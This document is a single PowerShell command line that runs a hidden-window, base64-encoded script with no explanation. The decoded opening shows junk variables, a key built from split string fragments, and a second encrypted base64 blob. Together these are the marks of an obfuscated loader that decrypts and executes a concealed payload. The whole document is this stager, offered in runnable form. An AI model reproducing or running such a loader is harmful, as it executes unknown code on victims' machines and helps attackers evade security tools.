    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABNAEYAcQBCAHEAQwB1AHEAIAA9ACAANwA2ADgANQANAAoAIAAgACAAIAAkAEQATQBPAGEAVgBqAE4AZQAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABHAEoAcgBXAGsAWgB0AHMAKQAgACoAIAAyADMAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABFAHgAZwBGAHgAVQBUAEUAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABIAHkAVQBPAFkAQQBMAGIAIAA9ACAAIgBPACIADQAKACAAIAAgACAAJABjAG8AawBNAE8AbgBQAG4AIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABXAGgAbQB2AHcAbwBMAG0AIAA9ACAAIgBQACIADQAKACAAIAAgACAAJABlAHcARgBpAE8AeQBaAG0AIAA9ACAAIgBBACIADQAKACAAIAAgACAAJABLAGIAWgB3AEUARABhAFEAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABRAEYAYwB6AHYAcwBkAGEAIAA9ACAAIgBCACIADQAKACAAIAAgACAAJABqAHAAQgBvAEEAcgBSAFkAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABuAG4AUwBDAGcAcgBzAHcAIAA9ACAAIgBmACIADQAKACAAIAAgACAAJABYAE4AawB2AGwAagBrAE8AIAA9ACAAIgBUACIADQAKACAAIAAgACAAJABpAEUAZwBFAEEAbABpAE0AIAA9ACAAIgBDACIADQAKACAAIAAgACAAJABZAE0AeQBrAHAAeABhAFoAIAA9ACAAIgBpACIADQAKACAAIAAgACAAJABwAGMAVABKAEIAWQBMAE4AIAA9ACAAIgB6ACIADQAKACAAIAAgACAAJABNAHAAUwBWAG4AagBYAEgAIAA9ACAAIgBYACIADQAKACAAIAAgACAAJABTAE0AbQBBAEgAcQB1AHMAIAA9ACAAIgBBACIADQAKACAAIAAgACAAJABwAFIAQQByAGkAdgBPAGUAIAA9ACAAIgBVACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAMQAzACAAKwAgADMAMwANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADcAKQAgAC0AIAAoACQAdAAxACAALwAgADYAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADcAIgAgACsAIAAiAE8AIgAgACsAIAAiADcAIgAgACsAIAAiAFAAIgAgACsAIAAiAEEAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEoAIgAgACsAIAAiAEIAIgAgACsAIAAiAEsAIgAgACsAIAAiAGYAIgAgACsAIAAiAFQAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAEMAIgAgACsAIAAiAGkAIgAgACsAIAAiAHoAIgAgACsAIAAiAFgAIgAgACsAIAAiAEEAIgAgACsAIAAiAFUAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBXAHAAVgBiADMAWgA5ADEAVABVAHUARABPADUAQQBmAGgANwBXAGQATABaAFkAUABjADUAQgBHAHYAYgBzAE0AawBGAEQAVwBzAFIAYQAwAGUAMgAzAEQAVQBnAFcARwBsAHoAQgBHAGUAYgBOAG8ASQBUAEIANQBNAHUANwBCAEgAMwBKAHoAdwBuAG0AQwA0AGgAMwA1AEkAMABjAGYAdwBpADMAQwBiAFoAYwBNAGsAbgBFAEMANQBSAGYAVwBCAFgAYwA0AGIAQwBGAFkAMAA4AGEANAByAEEASQBJAEsAQwBCAGoAMQBzAHEARwBVAHYAQQBNAGoAeQBSAHUAcgBkAEoAVABhAE8ATgA4AEYAVABTAFQAWgB3AFQAaABZAFEAbQBUAGoANQBIAGoATQBnAFIAZwBoAGkARwB3AGcAYwB4AFYAZABSAHkAVwAzAGkAdQBqAEQAaABCAFMASwBtAHoAagBWAGoAMwBrAHcAOAB4ADIAbwBzADgANABJAHMAYQBOADQAcQBCADAANABPAFYAVgBrAHYARAAwADQAYgBhAEkANAAyAFcAQwBwAC8AVAA4AFgANQB2AGYANgB4AEIAKwA4AGIATwBEAEMAaQAyAEwANABwAFQAdwB5ADgAQwA5AGwAVwBiAGsAawBYAFIARABwADIAVgBlAG0ASABnAEsAVgAyAEEANgBCADMARgA4AGoASABhAFMAdQBRAE0AYwA0AEkAbwBTAFIATABiADIAdgBGAFAAQQBpADgAbwBQADQAdABuAC8ANABrAEMARABwAFcATABhADgAUABUAEkAUwA0ADQAdQBpAFUAaABQAG8ATQB1AG8AQQBXADAAZABLAFcAZABNAGgANwBnAHQAOABKAE8AZwBHADUAUAA4AG4AawBIAEsALwBRAHgARABzADYAdwBrAEYAcAA5AC8AVgA0AFIAVABpAEUATwBnAGkAQwB6ADcAUABVAFgAcABSAHIAeAA3AE8AMQBVAG8AUQBoAG0AdQArAE0ANwB3ADkAQwBIAEYAMgB0ADQAbwBFAE4AbQAxAEIAUQBGAHIAVQBDAGcASwB6AG0AcABxAE8AeQA4AGUAagArAFkAZABVADUAVABpAGEAMQBEAGcAUwBuAFUAZgA2AEcAagBzAFkAWgBqAEIAcABFAGMAdAB6AG0AbQByAFMAawBrAFQATABHAHIAOABmAGYAWABYAHIAYgBqAEgAVQBQAGYAcQBYAGwAVwBQAEIAVQBIAGkAQwBRAHMAKwAvAHQAMAAzAFEARgB5AE8AegBZADIALwBXAEsAagB3AHMAMwBVAHEAdgBnADAAQwBLAGIAZQB0AGQAcgBjAFkAVQAzAFYAdgBzAG8AVgA0AFEAMABuAHkAWgA0ADQAbQA0AEsARQBrAGgAeQB2AGQASwBDAHoATwBuAHgAWABOAC8ARwBkAFAAWgA0AGQAcwB0AHgASgB4AGoAbwBKAFUAcgBtAHoAMgBxAGwAQgBKAEYAYgB0AEkAMABpAFcAMABiAFQAbwB5AEIAOQBrAFQAYwBVAFkAWABoAEEAdgBIAHkAeQAyAEMAZgB4ADMANgBwAFAAagBSAGYASgA2AG4AKwBhADEANwBXAC8AWQBOAHEAYQA4AGQAaQBnAEoAKwBQAHgAMQBLAFIANQBiADUASwBXAFgAZwBLADkAZQBsADcASQBaAGkAQQBRAFcAUABLAHcAWQBOAGwAVwBpADYANABoAGgAYgBuAGUAZgBEAG0ASABHAHoAYgBHAEoANAAyAHQARgBxAGsAcQBmAFAAVwBPAHEAZABXADYAaQB5AHUAbgB0AEgARABOAEcAQgBLAHAAdwBxADUANgBJAG4AawBBAHoAVwBFAG4ASABOAGIALwB3AG8ANAB4AGYAdABnADAAOQAzAGoARABYAFYAcQAvAHoAbQBsAG0AdQBJAFcAdgArAFgAeQBpAGQAWQBQAGwAWgBYAFEAMgBRAG8ATgBQAFEASABvAEwAcQBGADgAQwBNAGQAcwByAFYAdQBvAFMAZgByADcATABGAEMAVwBDAFUAMQBxAFUAeABXAGYAWABzADgAdgArADMAVwBWAFkAdgBTAFkAUABmAGMAdgBXAG0AUQBrAHcAdABXAG8AeQBZAG8ATwBYADgAcwBrAE0ARABmADIAcgB6AEUAVwB2AEcAcgBuADAAaABxADMAWABEAG0AdABZAFoATABuAC8AKwB1AFIAWQBjAGQAZwBLADEALwBxAHcAeQBpAFkAbQA2AGcAUQBwAEcAbQB1AGEAMABWAGwAMQBIAFcASQBBAFoASgB4AC8AMgA4AGMASwBZADMAcwA5AEYANwB5ACsAMwBoAG0AVgBkAEUAcwBsAGYARwBsAHcAVQBkADEASgBrAEwARAA1AHoAcgBKAHEARwBFAEIAaQB0AG0AeAB0AEQAVQBwAG0AcQBmAFAAOAA0AEIAWgBQAHcAYQBHAHAAaABzAGsAdAAzAG0AZgA4AFkAZQBoADgANQA4AG4AVgBiAFoAagBlAFkATABtAC8ANgAxADAAQQBZAGUASQB3AEUAbQBIAHkAQwA0ADcANgAxAFcAdQB1ADgAdgAwADQALwBhAFEATgB3AC8AWgB6AGwAUwBUAGgAcAA5AGIATwBPADkAbwBxAEcANwBoAE8ATAByAFUAcAB6AEEAUABPAGEAegB1AGMAVQBUAGQAVwBzADkAQwBIAFMANwBRAFUAYgBYAGoALwBaAFkAWgB0AHEAdABmAE0AdgB6AEkASwAzAHYAbgBNADYALwA4AGUAUQBYAEMAYQBTADcARgBnADQAMwBqAG4AbgA1AHQALwAzAG4ASgArAHAATwBOAHEAQgBjAFMASwBGAHkAYgBFAHAAMwBYAEgATgBMAHMAUwB1AEIATgBWAFYAdQBtADIAVABKAHYAMQA3AFYAVgBPADcAVABRAFEASABZAHcAdgBSADcAYgBwADIASQBIAEoAcwBiAFkARwBsAEEAbgBwAEkAYwBQAGoARQBxAFQAagBIAGgAVQBrADYAZgA1AG0AawBCAHoAUwBMAEUAOAAzAEwAeQBiAFkASQA5AFAARgBTAFQAaABHAEsAZgB4ADIAMwBaAFAAYgB3AFYAUwBtAEoAeABsAGoAQgB0ADUAVwA2AHoAUwA5ADUASAAzAGUANQBZAFAAcwBGADcAcwA1ADkATwBGAEsAOQBaAHAAZwBUAG8AdQBRADEAUgBxAFYAeABMAHYAQQByAHoAbwA1AFIARAA1AEUAcgBvAGwAVgA2AGMARQBvAEwARwAxAHMAcQA0AE8AeABjAG4AWQA5AFMAQwA1AFQAegA4AGUAbgBwAEQASABDAHMAagBUAEgAVwBDAE0AagBnAEcAOQBKACsAWABrADQASwA5AFgAYQAzAEsAWABBAGgAdwBiAFIAcwBwAHAASAB5AFEAbQBPAGoARgBlAHIAMgB6AEMASQB1AE0ASgBxAFAATwBrAGEAMAB2AGQAZwBRAHMAeQB3ADgAYgB3AE8AOAA0AGwAQgBwAEIAZQB2AHMANQB1AGoARwB2ADkAKwBnAEgAZABkAEoAVwBVADUAbgBSADYAeABQAGwAVQBMAEUARAA5AGMAWABPAG4ARgBtAHgAYQBGAEgAcwA4AEEAVAAxAEIAZgBkAGQAZABSAFEATQBZAGEANwA3AEEASwBlADQAdQB2AE0AWQAxAHUAagBGAFkAcQBjADAAYgArADQAcQBuAHgANwAzAFEAZABFAEsAYgBGAEoAQgBiAGoAVABNAGQAYwBqAFEAOAA5AE4AZQBsAFcANQBXADUATQBmAEEAdABHAHoAYwBpAE4AUwBOAHcAYgBCAGsASwBNADEAbQBzAEUARABIAHoAaABzADIANQB4ADAAYQBhADAANQBtADYAVAA5AE0ATABNAFEAVQBWAGIAegB0ADMATABsAFAAMABkAHQAWgBMAGIATgBnAGMAeABWADcAUABYAFIAagBFAHgAYwBxAG0AWAB5AE0AeAB0AGYAMABuAHcAcQBKADkAagBoAFAAVABCAFkAcwB4AGYAagBwAFAAZABoAEkAWABXADAASQBQAFIAKwBqAEgAdgBtACsARgBzAEIAegBiAGEAQgBTAEkAeABxAFMAQQB6ADUASwA0AFoAMQBXAFEASwBsADUAYgBkAFoARABmAGkAWgByAGQAMABnAFQARQA2AEMAegBzAGgASwBWAEYAVgBOADAAZgBuAHkAOAAwAFQAcgBzAE4ARQB3AEMAQQBkAFUAWABKAGEAUABPAEEAawBpAEoAVgBsAE0AbgA5AGoANgB1AEwAOABLAEQARQBIAHYARABsAFgAKwBMADIANQBIAHYARgBxAHEAdQBIACsAWABwAGIAVwBBAGkAagBSAFAASQAyADQASQBJAEIAVQBQAHgAZABOAGQATQBUAG8AMgBhAE8AcwBGAEwAWgBRAGoAcgAvAHIATwAvAEEAMwBDAGsAUABCAFoAUQBNAFkAUAAwAFkANwB2ADYANgBRAGUANwB6AGIAeQBCADgAQQB1AFYAVgBmAE4AQQByAEMAdQBMAEEAbgBVAEMAVgA0AHAAagB6AGUASQBMAHQAYQA1AFQAMwBsADMAUABHAFQAOABXAHAAQgB0ADUAOABhAFMARAB3AEgAQgAyAHMAbQA0ADEAYQBpADUARQBtAGEAUgByAGoAWABJAFEAMABVAFUAQwBnAEcATwAwAFAAUQBRAHYAdwBTADcAOQB1AEkASwB6AFcANwBxAGwATwBDAHcATgBlAFUATQB6AHkAQwBUADYARABvAFIAVABqAE8ATABaAHUAbABtADYARwBzAG4AZgBjADYARQBoAFkAUABjAG4AWgB4AHkATABnAHoAYwBzAGwASQBKAFUATgByADUAWABZADEAegBtAGgAYgAwADcAWAAzAEMAdwBDAGwAQQBnADUAaQAxAGoASgBVAHYAQQBvAEUAeABlAGwAMABaAEYASAArADYAbwBNAHQAaAAyAE0ANwBUAGoAbgBaAEgAKwAwAEgAbwBWADEAMQA3AFgAdABvAEsASwBtAFAAYgBzAEYAcABnAHAAdABiAE0AOABkAEwAcAAyAG8ARwBjACsAVQBVAG8AQwBJADEAbgBxAEYAUgBGAHYAUwBwAHoAcABnAEQAcwBqADYAYgBpAEIATwBiADEARQBPAGIAeABUAGgAcABIAG0ATQBhADAASwBCADAAbQBrAFoARQBqAHMAeAB3AFEAagBiAHUAZABIAHcATgBHAEsAagBUAEMAWAB6AEoAbAB3AFcATwBIAGQAagBZAEUAdQBPADEAVwBWAGEATgByAG8AZAByAEgAUgB2AG0AawA0AE8AbwBBADMASQA1AFoARABlAEsAVgBTAEgAaABQAGMAaQA4AHcARwBIACsAbwBOAGEARgBvAE8AVAArAG4ATQAxAHAAZgAxAHYAOQB6AGgAdABUADgAYQBxAEoAQwA4AGMARgB1AFYAZgBEAEUAUwBoAHkAawAzAFUAeABhADUAdwBVAFgAYwBsAFkAcQArAEIAYQBLAEQAbwArAFkAWABLAGUAVQBDAGoAcgBmAHcAcgBNAGEANQBnAEwARQBZAGgAaABxAEkASwBmAHkAMwB0AFgALwBJAGIANAAwAHEAUgBGAHkAUQBiAFAANQBlAEIAQgBtAFEALwBIAGgAdgArAHMASgA2AFcAZQBpAG8AeABmAGoANwBsAHUAWQA3AEYAVQBkAHAAeAAxAHAASQAxAHUATgBPAFgAZQBjADQAdABUAFkANwBGAEQAdABOAHAAbgB5AEkAWQBuADIAZwBCAEIAbAA4AHMAbgBtAFkARABnAHgAVwBvAEkAUQBIAFcARQBtAGEAOQB1AGkATQBsADQAcAAxAFoAVAAyAFMANQBBAEEAaQBYAHcAbQB6AHkAVgBXAHAATwBQAGQAbQAwAEgAcgBWAHYAZABhAGIANABBAFoARABvADgAVwB1AFkAWgBMAGkASgBkADcAcQBvAEEAdgBiADYAVgBvAFgAMgBWAHUAVgAyADgARgBsAHcARwBRAEQATwBVADcARwAvAFUAMABkAGUAUQBFAGYANABRAG8AOQBKAEoAOAB6AHMAMABuAHIAUwB0AG4AcgBrADQAdwBDAGkAaAA5AHoATgBtADYAcAB2AEQAcQBuAEwAdgB2AHIAKwBXAE4AdABFAHoASgBaAEEATAAvAHgAaQBpAFcAVgAvAFcAVgArAE4AYgBOAEQARwB0AEYAbABtAG4AWQBNAGQAQgBGAFUAWgBNAGoAYQBUAEUASgBFAHgASgBkAGcANgBhAFAAeABMAGYASABUAHgAVQB4AE0AWQAxAEQALwAzAHQAYgBTAGIAOQBXAFEAbwA3AFEAMwBoADAAegB2AEEASABFADQAMwA2AHkALwBSAEcAbgAwAEEALwB4AGcAYQBVAEEAWQBvAHMAMgAzAHUAVQAzAEYAWgBXAGwAcQBaADkARQBBAG0AOQBrAEwARABLAHAAaQBYAFoANwBtAEwANQBZAHEAZwBmADgATABZAHgAMAB1AFcAdQBJADAAYwA2ADIATABuADkARQBhAGsANQArAEEAUQBJAEsAQQBlAGcAQwBRAE4AawBPADUAUgArADMAKwA0ADIARwA5AEcAMQBiAFAATQBZAGYATQBzAHIAeABqAEQAOABnAEYANAAyACsANQBvAEoAOABkAEsARwBVADMASgAvAG4AawBqAE0AMABOAHgAQwBXAFIAQQB2AEQAMgA5AHkASgBTAHgAcwB4AHYAdAAxAEQAbgA2AE8AQwBNAFoAOQBnAHIAaABrAEsAcQBBAFYAKwArAE4AUwA3AGEAbQB5AGIAMwBQAHcAVQBoAFQAVgAzAFEAMQBwADMAYQBHADgAdQB2AHAAcAArACsAdQBYAGUASgBKAGgAagBuACsANABYAC8AdQBOADEASABBAEMAdAAxAFIAVAA5AGMAdABhADMAQgBxADAATABpADcAZwBGAHgAawBRAFoASgAzADUATwBuAEIAagA0AHkAZABLAE8AawBxAEwAZAB2AFkAcQBRAEIAYwBUAGUARgBsAGcAeQA4AGgAYQBLAEgAdQA4AE0AVABuAHIATABEADMAWABTAGsANAB3AFUAaQBmAGkAOQBGAHcAYQB5AGYATwA5AFMASgBUAHEAUQBmAHIANgBsAGoAVwArAEoAZwBUAHcAdQBFADIAaQBoAHMAZAB3AHcAMABXAGcAagB4AGIAeQBtAGcANABoAEwASABIAGoATwBrADUARgBMAFEAWAA0AFIASQBNAGMAbgBmADMAcQBMAE0AMABRAGkAMwBlAGgAagAzAEYATAB3AHYATABOAGQAbwBsAFIAVgBrAHcALwAxAE8AWQBNADAAQgBEAEkAYQA4AGEAbQBxAEoAawBLAGIAVQBoADEAagA3AEEAMwBZAEUAeABvAEgAYQBiAEwAdgBEAEoAagBNAGoAYwBGAEoANABHADgAdQBQAFEAVwBmAGIAcgB5AE0AKwBQAFgAeABRADMAUABCACsAQwAyAHEARwBTAEQASwB4AGMAcABDAEoAaAB1AHYASwBUAGwAWQBtAGoARwBNAHoAdQBoAGYAdgBmAFMAYwBHAEwAKwA4AFUAOABFAFAARgBaAFAANgBkAFMAUQBTAGoAcwBJAEEAbwBLADgAOAA4AEoAeAB6ADkANwBTAGsAUwB6AHoAUQBoAHIAZQAyADQAcwBQAGMAWQBTAHUAdgAvAFIAbgA4AEIAMwB0AHEAQwBOAEUASQBrAEIARAAxADcAQgB3ADIARgAzADUATQB2AE0AOQB2AFEAbgByAHAAUgBIAHQAaAA0AGYANQAwAGcAQQBEAHUATABBAEYAWABRAGcAUgAzAHgAdwA3AEMAdAA5AGsAcABGAGgAdgBPAFIATgA3ADkANgB6AHEAQQB4AGQAWQBSAFUAYQB2AHgAZwBSAC8AcABFAGgATABsAEMAdABFAE8AUAB6AEgAcAA4AEYARwBqAFgAeQBPAEkARwBNAGIANgBoAHAAeQBWAHgAWAB2AEEARABhADMAVwArAFQAZwBiACsAVQB0AFAANgA5AHEAVwBzADcANwBTAG8ASwBaAGQAagA0AEMAcwBJAEYAZwBvAFYATgBxAEUATAAyAEkAQgBlAHQAcQBUADYAeAArAG0AMwA1AFcARwBhAE4AMgBLAEsAKwBTAEgAYwBVAGwAagA3AEIAeABnAHUAWgBQAHcASwAvAHgATQA2AHAAYQAvAEYASwBDADkATwBHAGYAUABzAHgARgBrAHIANABIAGgAVAAyAG4AUQBMACsASQBBAE4AZABLAHkANABOAEEAMwBQAGEAcgBaAHMAMQB0AFkARQBHAHkAeABRADEAWABRAHIAYgA2ADMAcABBAEkAdABpAEsAeABMAGsARwBIAE4AVwBiADgAUgBBAEYAaQBmAGYAQQBqAFIAQwBwAFUAVwBIAGwAeQBGAGcAKwBOAFQATABXADgAZgBtAFcAMgBTADMAawBEAGcATgByAHYAMQBrAGMAMQBPAE0AOQBlAFAAaQBiAEkAdAB2AEkANQBwADgANwBVAGoAdwB3AE0AeQA4AGUAUQBrAEIASQBJAGEAbABQAHAATQBSADgAMwArAEUAVABLAG8ANgB6AFkASQBaAGQARABVAHEAZABtAEoAdwBCAGQAWgBnAHQARAAxADQAYgB2AEgAMAByAEQAOQB0AE4ASwA5AGMAaQAyADAAYwBEADgAMwBIAEsAQwBFAEEAQwAzADQALwBNAGgAOQBqAFQAVQBxADIARABkAEcAUQBqAHQAVQA5AFEANgBBAHcAcQBOADMAMAA3AFkAbwBlAFkAZgBBAHgAdgBjAGgANQBzADUAaABiAG8ANQBjAGIAVwBCAHMAdwBKAGgAYQBZAEcATgBCADgAKwBXADUATQBFAHIAMABTAFYANQBXADMASQBvADIANAB6AGsALwBlADEASQBYAHgANQAwAGQAeQBZAHEAUgBrADYAOQBXAEMASABMAFQAUABxAEcAWQBZAFgASABjAG8ANQBaAHQAaABtAFoAQwBoAHMAawA4AGEAcwAwAEsARQBtAHQASABqAGsARgBGAGkAVgBNAFAAMgBzAGwAbAA2AGEARwBuAFcATAByADQAdwBtAFIATAArAHcAUQBGAHkASwBJAGYAUABiAFMAcQAyAGwAYgBXAGkANwBBAE0ALwBZAEwAWQArAHAAWABXAFQAOABtADkAagB1AFkANABEAE4AbQBEAGgAZABBADAATwBQAHMAcgB2AHMANwAzAGcAZABWAHcASQBXAEEAeABiAE0ATwBIADQATgBqAGcAUwAvAEwAVwB5AEEAZgB4AEgAVQBzAHEAZABSAGEAeQBmAFcAbQBYAHEAMAA3AHcATgBZAGQAMgBXAGoAVwAvADQANQBzAG8AZwBUAHoAZABvAFgAVwBzAEkAbQB4ADEAdgBnAHQAUAA1AFYAbAB3AGMAcwBCAFEATgArADQAawBBAFMAbQA5AFoAWAAvAEcAOQBmADYAUgBGAFQAVAB3ADQAQQBLAGYASwBZAHYAaQBGAEIAWgBEAEwAeAA5AHoAVABiAFcAcwBLAEEASABNAEMAcABVAHIAcwBPAFIAUAAvAGoAWQBaAEwAeQBLAHYAQgA4AHoANQBwAHUAdQBVAEwASABQAGwAZQBkAFgAdwA1AGoAbABQADkAawB5AEMAYgBmAFUAegA0AEMAWgBUAEIAaABzAFkAbQArAHgATAB6AHMAZwByAEcAdwB1AE0AWQBzADEAZgBYAGUANAB1ADQAdAA5AFEAUwBCAFIARABWAEYAcwBEAHAASABKAGoAYwBSAHQANQBaADYASQA0ADgALwBiAGQASwB6AHAAcQA1AHkAVwBDADMAeABrAEcAbgBLAGwAaABjADYAcgB1AEQANwB5AGgAeQBRAE0AUwBqAHgAVwBiADQAQgB3AGcARAAzADMALwBlADcAbABuAHIAUQA2AEEAcwAxADAAdgBBAFMAYwBMAFUAVgBQADcAYgA0AEUAUgBHAHAAcgBvAG0AQgBWAGkAZgBLADkAaAB5AGgATQBlAE0AYQBFADkAdQBCAHkATwBxAEMAQQBXAE8AcABTAGwAdQB5AFgAcwAwAE0AWgBRAG0AcgBhAGUASgBXADYAbwAvAGsAUABTAFgASgBVAGIASgBwAFUAagBzADMAUAAzAG8AbABuAG4ANgBOAEQAeAAvAEgAWABJAHoAagAzAG8AZQBUAFEAawBzADgALwBlAE0AVwBkAFUANABYAFAATwBwAHgARwBrAG0AZAB5ADYAbwAxAGMAZgBrAGkAVgArAHoANABmAFkAMAAvAEUAagBSAFAAKwBhAFoAdwA0AFYAeQBpAEwAUgA0AHEAWQA5AFQAVAAyAHoAbgBmAGsAdwBhAHUAMgAzAHQAQgBCAHQAbQBwAEQAdAA3ADUALwBwAGQAOQBnAEYARgBpADcANABFAEQAeAA5AHAAMQBuADgAbgBMAFgASgBOAE0AbABoADgAWABqAHEAaAA4AFAAQgBFAHgATgBzAHkARwBSAEQAegAvAFEATQBCAG8ANAB0AE4AcQA3AG8AZABIAFMAeAAwAHkAeABDAEIAcQBDAEUAegBOAGcAcQBEADcAdwBoADgAegArAFgAOQBwAHkAegBFACsATwBGAFkASQBOAEcARwBRAG8AaQByAFcAYwBZAGsAaQA3AHMAUAB5AHUATQB5AFkAUgArADIAUgBnAGcAUgBRACsAcgBzAE4AWgBXAGYAegAwAE0AagBjAEMAbABDAEsAWAByAEQAVwBZAHEALwBjADEAYQBUAHcAYQBQAGUAYwB5ADAARwBrAEkAdABMADIAZgBnAHkAVgBwAG4AQQBVAHUASwAyAHEANAArAFIAeABYAG0AYwBDAE4AcgBLAEQAWgA2AFkASQB4AGoAWgA4AGwASABqAFkAbgB1AEwAZQBUAEIANABwAGwAaABjAEMAYQBUAG8AeQBJAHMANwB3ADgAYQBqAEgAegBhAHAAMwBUAGgAcQBVAEgATgBxADEAdgBDAE0ASABNAG8ASgBYADEAZQBRAHcARgBGADIAZABvAFoAdgBGAE4ATQA4AG4ARQBwAHoAMQBaAEUAKwBjADYAVwBGAHAAdABiADgASgA1AFUASQBsAGoAWgAwAGIASwAxAEoAMABVAHoATABqAFAAKwB2AEMAZQBnAFcAYgBFAEwAMQBZAGIAeQBtADMAbwAxADcAUwA0AEMAVwB1ADEAaQB1AHIAZgBEAFoAaQAvAHEATgA4AG8AdQBIAE4AbQA5AEEALwBFAG0ANQAwADgAcwBQAHQAVAByAGcANQBaAFoARgB5AEsAKwArAGkAQgBBAEcAdgBTAE4ATgBEAFYARgBNAE0AWABJAE0AcABwAEwAcAB2ACsAeQBvAGQAMgAvADUAQQBmAGsASwBOADYATQB0AEkAZgAwAGcAUgBXAFIATQArAFEAOABmAHIAUwBFAHIAKwB3AE4AaABPAG0AMQBCAHUAdgBHAEgAdAA4AEEAYgBnAFAAdABKAEsASgBOAEYAawBxADMASABIAGUAcwB5AFEAZAB3AFMARwBRADgAVABvAFcANABKADIAaQAxACsAcABqAFAAcgBmAGgATgBPAG8AUgBXAEsANAA4AEIAVwBnAG4AdwBTAEIAUABnAE8AcgBaAHgARAA0AHMAdwAyACsATgBTAFoAMgBrAHIAZQBkAGcAOAB3AE8AQwBsAEcANgB3AEsAbAA3ACsAMwBxAGYAKwB1AC8AVAA5AFIARABNAGYAaABTAHoAZgA1AHIAUQBHADMASQBUAGcAVgBiAGwAeABuAE4AeABiADMAOQBZAHUAYwBkAEYAUABHAE4AVQB5AGsAYgAzAGoAVwBqAGIAbABRAEwAZABXADMAQQBjAHoAZwBhADgAeQBYACsAUAAzAHAAQgBCAEYAMQA3AHcAVABCAG0AcABhACsANABsAFkAcQBmAE8AUQBBAGwAcABTAFgAQgBYAEgAcAAzAEkAUgBsAFYAUwBTADUAeQB1ADAAOABoAEQAaABRAHUARAA0AG0AYgBUAG4AZAArADcAUABIADUATAAyADcARQArAFkAMQBtAFoAVQB4AEQAMwA4AEMAdABQAGgANgByAEoAZABOAE0ASQBiAG0AVQBLAFMAaQA4AGMANQBpAEwAQwBOAG4AUwAvADQAdQArAHUAUQB0AGEAVABGAEMAWgA0ADIAVABZAEgARgBvAGoAaQArAEcAMABMAFQARQBUAFEAQwBqADcAaAA0AG0AdgBQAEsAUwBIAGYAWABGADMAdABUAFkAUwBtAGQARABUAEsATQB1AE4ANgBwAGQASQAvAGoAWABRAGoAWQBRAE8AZgBpAHQAQgAyAEgARwBJAEMANQA4AFEAaQAxAHkANwBmAG8AWQAyACsARgBiAHcAcgB5ADUATQBXADQAWQBWAGcAeQBCAHYAZwBJAFUAWABGAFEAZgBQAHoAdQA1AGsAZwBBAE4AaQBBACsAMQA0AHQAMABoAGoAVABnAGkARwBCAEIANwBTAHAAYgB4AEgAUgBFAFkAMQBUAHMAUABVAGYAMgBmAFoAawBtAHQAOQBaAFMARgArAEsAUAB4AEQAawBEAEEAVwBuACsALwBnADkAVgB4AGQAbwBCAGIAcABtAE4AUQBrADIAWQByAEIAZQA4ADgAWQA5AGgAdgBrAG4AZwBsAFcAeQBSAFkATgArAGgAcQA5AHUANwBBAHkAeQBWAFIAbgAwAEQAYgA0AEkAdgBIADkALwBvAEMAeQB2ADgAZABQAG4AVQAxAG0ARQB3AHEARABnAEYAMwAxAEoAWABGAHIAcgBHAEkAMQBnAFUAYQBiAGEAegBLAGEAZQAwAGIALwBrADcAcABZAEYAQQBPAHQAQwBjAGcAcQB6AHgASgBqAFoAZQAxACsAMAB3AGEASAA2AEkATgBFAEQAagA0ADAARwBOAGoAeQByAFUARwBqAHoAcwBUAHQAcQBYAGsAdQBsAHUALwBGAEoAKwArAGEAVABOAGgAUABxAEIAOQA3AEEAbgA4AFoANgBDADUASQBrAG8AdwBlAGwARQBxADkANABtAEoAZgB2ADMAVwBTADYATQBkAC8ARABVAHMAawBSAHcAZABVAGgAcABsAHEASQB5AC8AbwBxAEUAVABnAG0ASwAvAG4ARABCAHgAZgBRAHcAeABsAEcARwBjAHEAQgA2AGYAZABEAEUAcQBaADUAVQB4AHkAZQBiAEoAZQBSAHcAcQBWAHUAWQAxAFoAQQBGAFcAdQB3AHoAbQBBAFgAcQBUAEgAVwA2AEwAYwArAG0AVwBuAFcAcQA5AHMAbABlAHMAaQBJADkAMgBMADcAagBtAGwAKwBsAEUAdABVADgAZwBPAC8AdAB6AFYAUAB1ADYAYgBjAHQALwBZAG4AaQBmAFcANABOAC8AZAB0AGoAZgArADYAKwBxAHAASQBpACsAbABlAGcAKwBjAGgAMQB1AHAAZgBWAHEASABxAHoANABaAGQAZQAvAHAAKwBnAFIAegBXAEsAbABNAHgAdABlAHAAZgB1AGkAYQBZAGoAUwB6AEMASABxAFYAdwBKAEIAOQBMAHMAVQArAGMAYQB5AGUAYwBNAHMAOAB5AHMAMQAxAEMANQBuAEMAVABUAEYAYgBUAHYASwBTADkAWQBwAE0AVwB5AFgAdABuACsAKwBGAFIAMQBzAFEAUgBoAGsAMwBCAEQANQA3AEIAbwBQADcARgBSAFMANQB6ADMASABpAHIAMAB3AGcANgBoAGsAYQBNAFcARAArACsAcgBTAG4AVwBpAG0AegA3ADcARwBHAHkAZgBEAGwAbQBzAHMAUQBZAGgATABxADUARgBiAHgAVgAxAFcAZQB4AGQANQBXAHMARgBTAGQAcABwAHkANABnADcAYwBjAGsAdwBBAGIAUwBkADgAMgAyAFkAbABoAG4ARwBaAHYAUQBLAHQAMABwADgANQBrAFoAYwBXAGsAMwBkAFAAbgBUAHQAbAByADcASABKAGUASgBYAHYANwB6AGkAbwA3AGIAMQA2AGkAaAByADUAegBUAHYAVgBtAFIAKwA4AGoAMQBnAEYAZABXADUAMwA0AGcAegBqAHUAMQBLAHAAbgBuADQASwBWAHUAUgBRADQAbQByAGYASgBnAFQA